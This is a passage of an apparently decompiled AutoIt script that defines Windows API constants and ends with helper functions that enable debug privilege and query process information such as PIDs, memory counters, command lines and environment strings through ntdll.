  1211. GLOBAL CONST $WM_SYSKEYDOWN=260
  1212. GLOBAL CONST $WM_SYSKEYUP=261
  1213. GLOBAL CONST $WM_SYSCHAR=262
  1214. GLOBAL CONST $WM_SYSDEADCHAR=263
  1215. GLOBAL CONST $WM_INITDIALOG=272
  1216. GLOBAL CONST $WM_COMMAND=273
  1217. GLOBAL CONST $WM_SYSCOMMAND=274
  1218. GLOBAL CONST $WM_TIMER=275
  1219. GLOBAL CONST $WM_HSCROLL=276
  1220. GLOBAL CONST $WM_VSCROLL=277
  1221. GLOBAL CONST $WM_INITMENU=278
  1222. GLOBAL CONST $WM_INITMENUPOPUP=279
  1223. GLOBAL CONST $WM_MENUSELECT=287
  1224. GLOBAL CONST $WM_MENUCHAR=288
  1225. GLOBAL CONST $WM_ENTERIDLE=289
  1226. GLOBAL CONST $WM_MENURBUTTONUP=290
  1227. GLOBAL CONST $WM_MENUDRAG=291
  1228. GLOBAL CONST $WM_MENUGETOBJECT=292
  1229. GLOBAL CONST $WM_UNINITMENUPOPUP=293
  1230. GLOBAL CONST $WM_MENUCOMMAND=294
  1231. GLOBAL CONST $WM_CHANGEUISTATE=295
  1232. GLOBAL CONST $WM_UPDATEUISTATE=296
  1233. GLOBAL CONST $WM_QUERYUISTATE=297
  1234. GLOBAL CONST $WM_CTLCOLORMSGBOX=306
  1235. GLOBAL CONST $WM_CTLCOLOREDIT=307
  1236. GLOBAL CONST $WM_CTLCOLORLISTBOX=308
  1237. GLOBAL CONST $WM_CTLCOLORBTN=309
  1238. GLOBAL CONST $WM_CTLCOLORDLG=310
  1239. GLOBAL CONST $WM_CTLCOLORSCROLLBAR=311
  1240. GLOBAL CONST $WM_CTLCOLORSTATIC=312
  1241. GLOBAL CONST $WM_CTLCOLOR=25
  1242. GLOBAL CONST $MN_GETHMENU=481
  1243. GLOBAL CONST $NM_FIRST=0
  1244. GLOBAL CONST $NM_OUTOFMEMORY=$NM_FIRST-1
  1245. GLOBAL CONST $NM_CLICK=$NM_FIRST-2
  1246. GLOBAL CONST $NM_DBLCLK=$NM_FIRST-3
  1247. GLOBAL CONST $NM_RETURN=$NM_FIRST-4
  1248. GLOBAL CONST $NM_RCLICK=$NM_FIRST-5
  1249. GLOBAL CONST $NM_RDBLCLK=$NM_FIRST-6
  1250. GLOBAL CONST $NM_SETFOCUS=$NM_FIRST-7
  1251. GLOBAL CONST $NM_KILLFOCUS=$NM_FIRST-8
  1252. GLOBAL CONST $NM_CUSTOMDRAW=$NM_FIRST-12
  1253. GLOBAL CONST $NM_HOVER=$NM_FIRST-13
  1254. GLOBAL CONST $NM_NCHITTEST=$NM_FIRST-14
  1255. GLOBAL CONST $NM_KEYDOWN=$NM_FIRST-15
  1256. GLOBAL CONST $NM_RELEASEDCAPTURE=$NM_FIRST-16
  1257. GLOBAL CONST $NM_SETCURSOR=$NM_FIRST-17
  1258. GLOBAL CONST $NM_CHAR=$NM_FIRST-18
  1259. GLOBAL CONST $NM_TOOLTIPSCREATED=$NM_FIRST-19
  1260. GLOBAL CONST $NM_LDOWN=$NM_FIRST-20
  1261. GLOBAL CONST $NM_RDOWN=$NM_FIRST-21
  1262. GLOBAL CONST $NM_THEMECHANGED=$NM_FIRST-22
  1263. GLOBAL CONST $WM_MOUSEMOVE=512
  1264. GLOBAL CONST $WM_LBUTTONDOWN=513
  1265. GLOBAL CONST $WM_LBUTTONUP=514
  1266. GLOBAL CONST $WM_LBUTTONDBLCLK=515
  1267. GLOBAL CONST $WM_RBUTTONDOWN=516
  1268. GLOBAL CONST $WM_RBUTTONUP=517
  1269. GLOBAL CONST $WM_RBUTTONDBLCK=518
  1270. GLOBAL CONST $WM_MBUTTONDOWN=519
  1271. GLOBAL CONST $WM_MBUTTONUP=520
  1272. GLOBAL CONST $WM_MBUTTONDBLCK=521
  1273. GLOBAL CONST $WM_MOUSEWHEEL=522
  1274. GLOBAL CONST $WM_XBUTTONDOWN=523
  1275. GLOBAL CONST $WM_XBUTTONUP=524
  1276. GLOBAL CONST $WM_XBUTTONDBLCLK=525
  1277. GLOBAL CONST $WM_MOUSEHWHEEL=526
  1278. GLOBAL CONST $PS_SOLID=0
  1279. GLOBAL CONST $PS_DASH=1
  1280. GLOBAL CONST $PS_DOT=2
  1281. GLOBAL CONST $PS_DASHDOT=3
  1282. GLOBAL CONST $PS_DASHDOTDOT=4
  1283. GLOBAL CONST $PS_NULL=5
  1284. GLOBAL CONST $PS_INSIDEFRAME=6
  1285. GLOBAL CONST $LWA_ALPHA=2
  1286. GLOBAL CONST $LWA_COLORKEY=1
  1287. GLOBAL CONST $RGN_AND=1
  1288. GLOBAL CONST $RGN_OR=2
  1289. GLOBAL CONST $RGN_XOR=3
  1290. GLOBAL CONST $RGN_DIFF=4
  1291. GLOBAL CONST $RGN_COPY=5
  1292. GLOBAL CONST $ERRORREGION=0
  1293. GLOBAL CONST $NULLREGION=1
  1294. GLOBAL CONST $SIMPLEREGION=2
  1295. GLOBAL CONST $COMPLEXREGION=3
  1296. GLOBAL CONST $TRANSPARENT=1
  1297. GLOBAL CONST $OPAQUE=2
  1298. GLOBAL CONST $CCM_FIRST=8192
  1299. GLOBAL CONST $CCM_GETUNICODEFORMAT=($CCM_FIRST+6)
  1300. GLOBAL CONST $CCM_SETUNICODEFORMAT=($CCM_FIRST+5)
  1301. GLOBAL CONST $CCM_SETBKCOLOR=$CCM_FIRST+1
  1302. GLOBAL CONST $CCM_SETCOLORSCHEME=$CCM_FIRST+2
  1303. GLOBAL CONST $CCM_GETCOLORSCHEME=$CCM_FIRST+3
  1304. GLOBAL CONST $CCM_GETDROPTARGET=$CCM_FIRST+4
  1305. GLOBAL CONST $CCM_SETWINDOWTHEME=$CCM_FIRST+11
  1306. GLOBAL CONST $GA_PARENT=1
  1307. GLOBAL CONST $GA_ROOT=2
  1308. GLOBAL CONST $GA_ROOTOWNER=3
  1309. GLOBAL CONST $SM_CXSCREEN=0
  1310. GLOBAL CONST $SM_CYSCREEN=1
  1311. GLOBAL CONST $SM_CXVSCROLL=2
  1312. GLOBAL CONST $SM_CYHSCROLL=3
  1313. GLOBAL CONST $SM_CYCAPTION=4
  1314. GLOBAL CONST $SM_CXBORDER=5
  1315. GLOBAL CONST $SM_CYBORDER=6
  1316. GLOBAL CONST $SM_CXDLGFRAME=7
  1317. GLOBAL CONST $SM_CYDLGFRAME=8
  1318. GLOBAL CONST $SM_CYVTHUMB=9
  1319. GLOBAL CONST $SM_CXHTHUMB=10
  1320. GLOBAL CONST $SM_CXICON=11
  1321. GLOBAL CONST $SM_CYICON=12
  1322. GLOBAL CONST $SM_CXCURSOR=13
  1323. GLOBAL CONST $SM_CYCURSOR=14
  1324. GLOBAL CONST $SM_CYMENU=15
  1325. GLOBAL CONST $SM_CXFULLSCREEN=16
  1326. GLOBAL CONST $SM_CYFULLSCREEN=17
  1327. GLOBAL CONST $SM_CYKANJIWINDOW=18
  1328. GLOBAL CONST $SM_MOUSEPRESENT=19
  1329. GLOBAL CONST $SM_CYVSCROLL=20
  1330. GLOBAL CONST $SM_CXHSCROLL=21
  1331. GLOBAL CONST $SM_DEBUG=22
  1332. GLOBAL CONST $SM_SWAPBUTTON=23
  1333. GLOBAL CONST $SM_RESERVED1=24
  1334. GLOBAL CONST $SM_RESERVED2=25
  1335. GLOBAL CONST $SM_RESERVED3=26
  1336. GLOBAL CONST $SM_RESERVED4=27
  1337. GLOBAL CONST $SM_CXMIN=28
  1338. GLOBAL CONST $SM_CYMIN=29
  1339. GLOBAL CONST $SM_CXSIZE=30
  1340. GLOBAL CONST $SM_CYSIZE=31
  1341. GLOBAL CONST $SM_CXFRAME=32
  1342. GLOBAL CONST $SM_CYFRAME=33
  1343. GLOBAL CONST $SM_CXMINTRACK=34
  1344. GLOBAL CONST $SM_CYMINTRACK=35
  1345. GLOBAL CONST $SM_CXDOUBLECLK=36
  1346. GLOBAL CONST $SM_CYDOUBLECLK=37
  1347. GLOBAL CONST $SM_CXICONSPACING=38
  1348. GLOBAL CONST $SM_CYICONSPACING=39
  1349. GLOBAL CONST $SM_MENUDROPALIGNMENT=40
  1350. GLOBAL CONST $SM_PENWINDOWS=41
  1351. GLOBAL CONST $SM_DBCSENABLED=42
  1352. GLOBAL CONST $SM_CMOUSEBUTTONS=43
  1353. GLOBAL CONST $SM_SECURE=44
  1354. GLOBAL CONST $SM_CXEDGE=45
  1355. GLOBAL CONST $SM_CYEDGE=46
  1356. GLOBAL CONST $SM_CXMINSPACING=47
  1357. GLOBAL CONST $SM_CYMINSPACING=48
  1358. GLOBAL CONST $SM_CXSMICON=49
  1359. GLOBAL CONST $SM_CYSMICON=50
  1360. GLOBAL CONST $SM_CYSMCAPTION=51
  1361. GLOBAL CONST $SM_CXSMSIZE=52
  1362. GLOBAL CONST $SM_CYSMSIZE=53
  1363. GLOBAL CONST $SM_CXMENUSIZE=54
  1364. GLOBAL CONST $SM_CYMENUSIZE=55
  1365. GLOBAL CONST $SM_ARRANGE=56
  1366. GLOBAL CONST $SM_CXMINIMIZED=57
  1367. GLOBAL CONST $SM_CYMINIMIZED=58
  1368. GLOBAL CONST $SM_CXMAXTRACK=59
  1369. GLOBAL CONST $SM_CYMAXTRACK=60
  1370. GLOBAL CONST $SM_CXMAXIMIZED=61
  1371. GLOBAL CONST $SM_CYMAXIMIZED=62
  1372. GLOBAL CONST $SM_NETWORK=63
  1373. GLOBAL CONST $SM_CLEANBOOT=67
  1374. GLOBAL CONST $SM_CXDRAG=68
  1375. GLOBAL CONST $SM_CYDRAG=69
  1376. GLOBAL CONST $SM_SHOWSOUNDS=70
  1377. GLOBAL CONST $SM_CXMENUCHECK=71
  1378. GLOBAL CONST $SM_CYMENUCHECK=72
  1379. GLOBAL CONST $SM_SLOWMACHINE=73
  1380. GLOBAL CONST $SM_MIDEASTENABLED=74
  1381. GLOBAL CONST $SM_MOUSEWHEELPRESENT=75
  1382. GLOBAL CONST $SM_XVIRTUALSCREEN=76
  1383. GLOBAL CONST $SM_YVIRTUALSCREEN=77
  1384. GLOBAL CONST $SM_CXVIRTUALSCREEN=78
  1385. GLOBAL CONST $SM_CYVIRTUALSCREEN=79
  1386. GLOBAL CONST $SM_CMONITORS=80
  1387. GLOBAL CONST $SM_SAMEDISPLAYFORMAT=81
  1388. GLOBAL CONST $SM_IMMENABLED=82
  1389. GLOBAL CONST $SM_CXFOCUSBORDER=83
  1390. GLOBAL CONST $SM_CYFOCUSBORDER=84
  1391. GLOBAL CONST $SM_TABLETPC=86
  1392. GLOBAL CONST $SM_MEDIACENTER=87
  1393. GLOBAL CONST $SM_STARTER=88
  1394. GLOBAL CONST $SM_SERVERR2=89
  1395. GLOBAL CONST $SM_CMETRICS=90
  1396. GLOBAL CONST $SM_REMOTESESSION=4096
  1397. GLOBAL CONST $SM_SHUTTINGDOWN=8192
  1398. GLOBAL CONST $SM_REMOTECONTROL=8193
  1399. GLOBAL CONST $SM_CARETBLINKINGENABLED=8194
  1400. GLOBAL CONST $BLACKNESS=66
  1401. GLOBAL CONST $CAPTUREBLT=1073741824
  1402. GLOBAL CONST $DSTINVERT=5570569
  1403. GLOBAL CONST $MERGECOPY=12583114
  1404. GLOBAL CONST $MERGEPAINT=12255782
  1405. GLOBAL CONST $NOMIRRORBITMAP=-2147483648
  1406. GLOBAL CONST $NOTSRCCOPY=3342344
  1407. GLOBAL CONST $NOTSRCERASE=1114278
  1408. GLOBAL CONST $PATCOPY=15728673
  1409. GLOBAL CONST $PATINVERT=5898313
  1410. GLOBAL CONST $PATPAINT=16452105
  1411. GLOBAL CONST $SRCAND=8913094
  1412. GLOBAL CONST $SRCCOPY=13369376
  1413. GLOBAL CONST $SRCERASE=4457256
  1414. GLOBAL CONST $SRCINVERT=6684742
  1415. GLOBAL CONST $SRCPAINT=15597702
  1416. GLOBAL CONST $WHITENESS=16711778
  1417. GLOBAL CONST $DT_BOTTOM=8
  1418. GLOBAL CONST $DT_CALCRECT=1024
  1419. GLOBAL CONST $DT_CENTER=1
  1420. GLOBAL CONST $DT_EDITCONTROL=8192
  1421. GLOBAL CONST $DT_END_ELLIPSIS=32768
  1422. GLOBAL CONST $DT_EXPANDTABS=64
  1423. GLOBAL CONST $DT_EXTERNALLEADING=512
  1424. GLOBAL CONST $DT_HIDEPREFIX=1048576
  1425. GLOBAL CONST $DT_INTERNAL=4096
  1426. GLOBAL CONST $DT_LEFT=0
  1427. GLOBAL CONST $DT_MODIFYSTRING=65536
  1428. GLOBAL CONST $DT_NOCLIP=256
  1429. GLOBAL CONST $DT_NOFULLWIDTHCHARBREAK=524288
  1430. GLOBAL CONST $DT_NOPREFIX=2048
  1431. GLOBAL CONST $DT_PATH_ELLIPSIS=16384
  1432. GLOBAL CONST $DT_PREFIXONLY=2097152
  1433. GLOBAL CONST $DT_RIGHT=2
  1434. GLOBAL CONST $DT_RTLREADING=131072
  1435. GLOBAL CONST $DT_SINGLELINE=32
  1436. GLOBAL CONST $DT_TABSTOP=128
  1437. GLOBAL CONST $DT_TOP=0
  1438. GLOBAL CONST $DT_VCENTER=4
  1439. GLOBAL CONST $DT_WORDBREAK=16
  1440. GLOBAL CONST $DT_WORD_ELLIPSIS=262144
  1441. GLOBAL CONST $RDW_ERASE=4
  1442. GLOBAL CONST $RDW_FRAME=1024
  1443. GLOBAL CONST $RDW_INTERNALPAINT=2
  1444. GLOBAL CONST $RDW_INVALIDATE=1
  1445. GLOBAL CONST $RDW_NOERASE=32
  1446. GLOBAL CONST $RDW_NOFRAME=2048
  1447. GLOBAL CONST $RDW_NOINTERNALPAINT=16
  1448. GLOBAL CONST $RDW_VALIDATE=8
  1449. GLOBAL CONST $RDW_ERASENOW=512
  1450. GLOBAL CONST $RDW_UPDATENOW=256
  1451. GLOBAL CONST $RDW_ALLCHILDREN=128
  1452. GLOBAL CONST $RDW_NOCHILDREN=64
  1453. GLOBAL CONST $WM_RENDERFORMAT=773
  1454. GLOBAL CONST $WM_RENDERALLFORMATS=774
  1455. GLOBAL CONST $WM_DESTROYCLIPBOARD=775
  1456. GLOBAL CONST $WM_DRAWCLIPBOARD=776
  1457. GLOBAL CONST $WM_PAINTCLIPBOARD=777
  1458. GLOBAL CONST $WM_VSCROLLCLIPBOARD=778
  1459. GLOBAL CONST $WM_SIZECLIPBOARD=779
  1460. GLOBAL CONST $WM_ASKCBFORMATNAME=780
  1461. GLOBAL CONST $WM_CHANGECBCHAIN=781
  1462. GLOBAL CONST $WM_HSCROLLCLIPBOARD=782
  1463. GLOBAL CONST $HTERROR=-2
  1464. GLOBAL CONST $HTTRANSPARENT=-1
  1465. GLOBAL CONST $HTNOWHERE=0
  1466. GLOBAL CONST $HTCLIENT=1
  1467. GLOBAL CONST $HTCAPTION=2
  1468. GLOBAL CONST $HTSYSMENU=3
  1469. GLOBAL CONST $HTGROWBOX=4
  1470. GLOBAL CONST $HTSIZE=$HTGROWBOX
  1471. GLOBAL CONST $HTMENU=5
  1472. GLOBAL CONST $HTHSCROLL=6
  1473. GLOBAL CONST $HTVSCROLL=7
  1474. GLOBAL CONST $HTMINBUTTON=8
  1475. GLOBAL CONST $HTMAXBUTTON=9
  1476. GLOBAL CONST $HTLEFT=10
  1477. GLOBAL CONST $HTRIGHT=11
  1478. GLOBAL CONST $HTTOP=12
  1479. GLOBAL CONST $HTTOPLEFT=13
  1480. GLOBAL CONST $HTTOPRIGHT=14
  1481. GLOBAL CONST $HTBOTTOM=15
  1482. GLOBAL CONST $HTBOTTOMLEFT=16
  1483. GLOBAL CONST $HTBOTTOMRIGHT=17
  1484. GLOBAL CONST $HTBORDER=18
  1485. GLOBAL CONST $HTREDUCE=$HTMINBUTTON
  1486. GLOBAL CONST $HTZOOM=$HTMAXBUTTON
  1487. GLOBAL CONST $HTSIZEFIRST=$HTLEFT
  1488. GLOBAL CONST $HTSIZELAST=$HTBOTTOMRIGHT
  1489. GLOBAL CONST $HTOBJECT=19
  1490. GLOBAL CONST $HTCLOSE=20
  1491. GLOBAL CONST $HTHELP=21
  1492. GLOBAL CONST $COLOR_SCROLLBAR=0
  1493. GLOBAL CONST $COLOR_BACKGROUND=1
  1494. GLOBAL CONST $COLOR_ACTIVECAPTION=2
  1495. GLOBAL CONST $COLOR_INACTIVECAPTION=3
  1496. GLOBAL CONST $COLOR_MENU=4
  1497. GLOBAL CONST $COLOR_WINDOW=5
  1498. GLOBAL CONST $COLOR_WINDOWFRAME=6
  1499. GLOBAL CONST $COLOR_MENUTEXT=7
  1500. GLOBAL CONST $COLOR_WINDOWTEXT=8
  1501. GLOBAL CONST $COLOR_CAPTIONTEXT=9
  1502. GLOBAL CONST $COLOR_ACTIVEBORDER=10
  1503. GLOBAL CONST $COLOR_INACTIVEBORDER=11
  1504. GLOBAL CONST $COLOR_APPWORKSPACE=12
  1505. GLOBAL CONST $COLOR_HIGHLIGHT=13
  1506. GLOBAL CONST $COLOR_HIGHLIGHTTEXT=14
  1507. GLOBAL CONST $COLOR_BTNFACE=15
  1508. GLOBAL CONST $COLOR_BTNSHADOW=16
  1509. GLOBAL CONST $COLOR_GRAYTEXT=17
  1510. GLOBAL CONST $COLOR_BTNTEXT=18
  1511. GLOBAL CONST $COLOR_INACTIVECAPTIONTEXT=19
  1512. GLOBAL CONST $COLOR_BTNHIGHLIGHT=20
  1513. GLOBAL CONST $COLOR_3DDKSHADOW=21
  1514. GLOBAL CONST $COLOR_3DLIGHT=22
  1515. GLOBAL CONST $COLOR_INFOTEXT=23
  1516. GLOBAL CONST $COLOR_INFOBK=24
  1517. GLOBAL CONST $COLOR_HOTLIGHT=26
  1518. GLOBAL CONST $COLOR_GRADIENTACTIVECAPTION=27
  1519. GLOBAL CONST $COLOR_GRADIENTINACTIVECAPTION=28
  1520. GLOBAL CONST $COLOR_MENUHILIGHT=29
  1521. GLOBAL CONST $COLOR_MENUBAR=30
  1522. GLOBAL CONST $COLOR_DESKTOP=1
  1523. GLOBAL CONST $COLOR_3DFACE=15
  1524. GLOBAL CONST $COLOR_3DSHADOW=16
  1525. GLOBAL CONST $COLOR_3DHIGHLIGHT=20
  1526. GLOBAL CONST $COLOR_3DHILIGHT=20
  1527. GLOBAL CONST $COLOR_BTNHILIGHT=20
  1528. GLOBAL CONST $HINST_COMMCTRL=-1
  1529. GLOBAL CONST $IDB_STD_SMALL_COLOR=0
  1530. GLOBAL CONST $IDB_STD_LARGE_COLOR=1
  1531. GLOBAL CONST $IDB_VIEW_SMALL_COLOR=4
  1532. GLOBAL CONST $IDB_VIEW_LARGE_COLOR=5
  1533. GLOBAL CONST $IDB_HIST_SMALL_COLOR=8
  1534. GLOBAL CONST $IDB_HIST_LARGE_COLOR=9
  1535. GLOBAL CONST $STARTF_FORCEOFFFEEDBACK=128
  1536. GLOBAL CONST $STARTF_FORCEONFEEDBACK=64
  1537. GLOBAL CONST $STARTF_RUNFULLSCREEN=32
  1538. GLOBAL CONST $STARTF_USECOUNTCHARS=8
  1539. GLOBAL CONST $STARTF_USEFILLATTRIBUTE=16
  1540. GLOBAL CONST $STARTF_USEHOTKEY=512
  1541. GLOBAL CONST $STARTF_USEPOSITION=4
  1542. GLOBAL CONST $STARTF_USESHOWWINDOW=1
  1543. GLOBAL CONST $STARTF_USESIZE=2
  1544. GLOBAL CONST $STARTF_USESTDHANDLES=256
  1545. GLOBAL CONST $CDDS_PREPAINT=1
  1546. GLOBAL CONST $CDDS_POSTPAINT=2
  1547. GLOBAL CONST $CDDS_PREERASE=3
  1548. GLOBAL CONST $CDDS_POSTERASE=4
  1549. GLOBAL CONST $CDDS_ITEM=65536
  1550. GLOBAL CONST $CDDS_ITEMPREPAINT=65537
  1551. GLOBAL CONST $CDDS_ITEMPOSTPAINT=65538
  1552. GLOBAL CONST $CDDS_ITEMPREERASE=65539
  1553. GLOBAL CONST $CDDS_ITEMPOSTERASE=65540
  1554. GLOBAL CONST $CDDS_SUBITEM=131072
  1555. GLOBAL CONST $CDIS_SELECTED=1
  1556. GLOBAL CONST $CDIS_GRAYED=2
  1557. GLOBAL CONST $CDIS_DISABLED=4
  1558. GLOBAL CONST $CDIS_CHECKED=8
  1559. GLOBAL CONST $CDIS_FOCUS=16
  1560. GLOBAL CONST $CDIS_DEFAULT=32
  1561. GLOBAL CONST $CDIS_HOT=64
  1562. GLOBAL CONST $CDIS_MARKED=128
  1563. GLOBAL CONST $CDIS_INDETERMINATE=256
  1564. GLOBAL CONST $CDIS_SHOWKEYBOARDCUES=512
  1565. GLOBAL CONST $CDIS_NEARHOT=1024
  1566. GLOBAL CONST $CDIS_OTHERSIDEHOT=2048
  1567. GLOBAL CONST $CDIS_DROPHILITED=4096
  1568. GLOBAL CONST $CDRF_DODEFAULT=0
  1569. GLOBAL CONST $CDRF_NEWFONT=2
  1570. GLOBAL CONST $CDRF_SKIPDEFAULT=4
  1571. GLOBAL CONST $CDRF_NOTIFYPOSTPAINT=16
  1572. GLOBAL CONST $CDRF_NOTIFYITEMDRAW=32
  1573. GLOBAL CONST $CDRF_NOTIFYSUBITEMDRAW=32
  1574. GLOBAL CONST $CDRF_NOTIFYPOSTERASE=64
  1575. GLOBAL CONST $CDRF_DOERASE=8
  1576. GLOBAL CONST $CDRF_SKIPPOSTPAINT=256
  1577. GLOBAL CONST $GUI_SS_DEFAULT_GUI=BITOR($WS_MINIMIZEBOX,$WS_CAPTION,$WS_POPUP,$WS_SYSMENU)
  1578. GLOBAL $_COMMON_NTDLL=DLLOPEN("ntdll.dll")
  1579. FUNC _GETDEBUGPRIVILEGERTL()
  1580. LOCAL $ARET=DLLCALL($_COMMON_NTDLL,"long","RtlAdjustPrivilege","ulong",20,"bool",TRUE ,"bool",FALSE ,"bool*",0)
  1581. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  1582. IF $ARET[0]THEN RETURN SETERROR(3,$ARET[0],FALSE )
  1583. RETURN TRUE
  1584. ENDFUNC
  1585. FUNC __PUDQUERYPROCESS($HPROCESS,$IPROCINFOCLASS,$VPROCINFODATA,$IPROCINFOSZ,$SPROCINFOTYPE="ptr")
  1586. LOCAL $ARET=DLLCALL($_COMMON_NTDLL,"long","NtQueryInformationProcess","handle",$HPROCESS,"int",$IPROCINFOCLASS,$SPROCINFOTYPE,$VPROCINFODATA,"ulong",$IPROCINFOSZ,"ulong*",0)
  1587. IF @ERROR THEN RETURN SETERROR(2,@ERROR,"")
  1588. IF $ARET[0]THEN RETURN SETERROR(6,$ARET[0],"")
  1589. IF $ARET[5]<>$IPROCINFOSZ THEN SETERROR(7,0)
  1590. RETURN $ARET
  1591. ENDFUNC
  1592. FUNC __PUDGETBASIC($HPROCESS,$IINFO)
  1593. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,-1)
  1594. LOCAL $STPBI=DLLSTRUCTCREATE("ulong_ptr;ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr")
  1595. __PUDQUERYPROCESS($HPROCESS,0,DLLSTRUCTGETPTR($STPBI),DLLSTRUCTGETSIZE($STPBI))
  1596. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
  1597. RETURN DLLSTRUCTGETDATA($STPBI,$IINFO)
  1598. ENDFUNC
  1599. FUNC _PROCESSUDGETPID($HPROCESS)
  1600. LOCAL $VRET=__PUDGETBASIC($HPROCESS,5)
  1601. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  1602. RETURN $VRET
  1603. ENDFUNC
  1604. FUNC _PROCESSUDGETPARENTPID($HPROCESS)
  1605. LOCAL $VRET=__PUDGETBASIC($HPROCESS,6)
  1606. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  1607. RETURN $VRET
  1608. ENDFUNC
  1609. FUNC _PROCESSUDGETSESSIONID($HPROCESS)
  1610. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,-1)
  1611. LOCAL $ARET=__PUDQUERYPROCESS($HPROCESS,24,0,4,"ulong*")
  1612. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
  1613. RETURN $ARET[3]
  1614. ENDFUNC
  1615. FUNC _PROCESSUDGETHANDLECOUNT($HPROCESS)
  1616. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,-1)
  1617. LOCAL $ARET=__PUDQUERYPROCESS($HPROCESS,20,0,4,"ulong*")
  1618. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
  1619. RETURN $ARET[3]
  1620. ENDFUNC
  1621. FUNC _PROCESSUDGETMEMINFO($HPROCESS,$ICOUNTERTOGET=-1)
  1622. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,-1)
  1623. LOCAL $STVMCOUNTERS=DLLSTRUCTCREATE("ulong_ptr;ulong_ptr;dword;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr")
  1624. __PUDQUERYPROCESS($HPROCESS,3,DLLSTRUCTGETPTR($STVMCOUNTERS),DLLSTRUCTGETSIZE($STVMCOUNTERS))
  1625. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
  1626. IF $ICOUNTERTOGET<0 THEN
  1627. DIM $AMEMINFO[11]
  1628. FOR $I=0 TO 8
  1629. $AMEMINFO[$I]=DLLSTRUCTGETDATA($STVMCOUNTERS,$I+3)
  1630. NEXT
  1631. $AMEMINFO[9]=DLLSTRUCTGETDATA($STVMCOUNTERS,1)
  1632. $AMEMINFO[10]=DLLSTRUCTGETDATA($STVMCOUNTERS,2)
  1633. RETURN $AMEMINFO
  1634. ENDIF
  1635. IF $ICOUNTERTOGET>8 THEN RETURN DLLSTRUCTGETDATA($STVMCOUNTERS,$ICOUNTERTOGET-8)
  1636. RETURN DLLSTRUCTGETDATA($STVMCOUNTERS,$ICOUNTERTOGET+3)
  1637. ENDFUNC
  1638. FUNC _PROCESSUDGETSTRINGS($HPROCESS,$BGETENVSTR=FALSE )
  1639. LOCAL $PPEB,$STPEBTOP,$PPROCESSPARAMS,$STPROCESSPARAMS
  1640. $PPEB=__PUDGETBASIC($HPROCESS,2)
  1641. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1642. $STPEBTOP=DLLSTRUCTCREATE("byte;byte;byte;byte;handle;ptr;ptr;ptr")
  1643. _PROCESSMEMORYREAD($HPROCESS,$PPEB,DLLSTRUCTGETPTR($STPEBTOP),DLLSTRUCTGETSIZE($STPEBTOP))
  1644. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1645. $PPROCESSPARAMS=DLLSTRUCTGETDATA($STPEBTOP,8)
  1646. $STPROCESSPARAMS=DLLSTRUCTCREATE("ulong;ulong;ulong;ulong;ptr;ulong;ptr;ptr;ptr;ushort;ushort;ptr;ptr;ushort;ushort;ptr;ushort;ushort;ptr;ushort;ushort;ptr;ptr;ulong;ulong;ulong;ulong;ulong;ulong;ulong;ulong;ulong_ptr;ushort;ushort;ptr;ushort;ushort;ptr;ushort;ushort;ptr;ushort;ushort;ptr")
  1647. _PROCESSMEMORYREAD($HPROCESS,$PPROCESSPARAMS,DLLSTRUCTGETPTR($STPROCESSPARAMS),DLLSTRUCTGETSIZE($STPROCESSPARAMS))
  1648. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1649. LOCAL $AINFOARRAY[9],$AINDEXES[8]=[10,14,17,20,33,36,39,42]
  1650. LOCAL $ICURMINLEN,$ICURMAXLEN,$ITEMP,$PSTRING,$STSTRING,$IERRTOTAL=0
  1651. FOR $I=0 TO 7
  1652. $ITEMP=$AINDEXES[$I]
  1653. $ICURMINLEN=DLLSTRUCTGETDATA($STPROCESSPARAMS,$ITEMP)
  1654. $ICURMAXLEN=DLLSTRUCTGETDATA($STPROCESSPARAMS,$ITEMP+1)
  1655. $PSTRING=DLLSTRUCTGETDATA($STPROCESSPARAMS,$ITEMP+2)
  1656. IF $ICURMINLEN>0 AND $ICURMAXLEN>2 THEN
  1657. $STSTRING=DLLSTRUCTCREATE("wchar["&ROUND($ICURMAXLEN/2)&"]")
  1658. _PROCESSMEMORYREAD($HPROCESS,$PSTRING,DLLSTRUCTGETPTR($STSTRING),$ICURMAXLEN)
  1659. IF @ERROR THEN
  1660. $IERRTOTAL+=1
  1661. ELSE
  1662. $AINFOARRAY[$I]=DLLSTRUCTGETDATA($STSTRING,1)
  1663. ENDIF
  1664. ENDIF
  1665. NEXT
  1666. $AINFOARRAY[2]=STRINGREPLACE($AINFOARRAY[2],"\??\","")
  1667. IF NOT $BGETENVSTR THEN
  1668. REDIM $AINFOARRAY[8]
  1669. RETURN SETEXTENDED($IERRTOTAL,$AINFOARRAY)
  1670. ENDIF
  1671. LOCAL $STENV,$SENVVARS,$ICUTOFF,$AENVVARS
  1672. $STENV=DLLSTRUCTCREATE("byte[4096]")
  1673. _PROCESSMEMORYREAD($HPROCESS,DLLSTRUCTGETDATA($STPROCESSPARAMS,23),DLLSTRUCTGETPTR($STENV),DLLSTRUCTGETSIZE($STENV))
  1674. IF @ERROR THEN $IERRTOTAL+=1
  1675. $SENVVARS=BINARYTOSTRING(DLLSTRUCTGETDATA($STENV,1),2)
  1676. $ICUTOFF=STRINGINSTR($SENVVARS,CHRW(0)&CHRW(0),0)
  1677. IF $ICUTOFF THEN $SENVVARS=STRINGLEFT($SENVVARS,$ICUTOFF-1)
  1678. $AINFOARRAY[8]=STRINGREPLACE($SENVVARS,CHRW(0),@LF)
  1679. RETURN SETEXTENDED($IERRTOTAL,$AINFOARRAY)
  1680. ENDFUNC
  1681. FUNC _PROCESSUDGETHEAPS($HPROCESS)
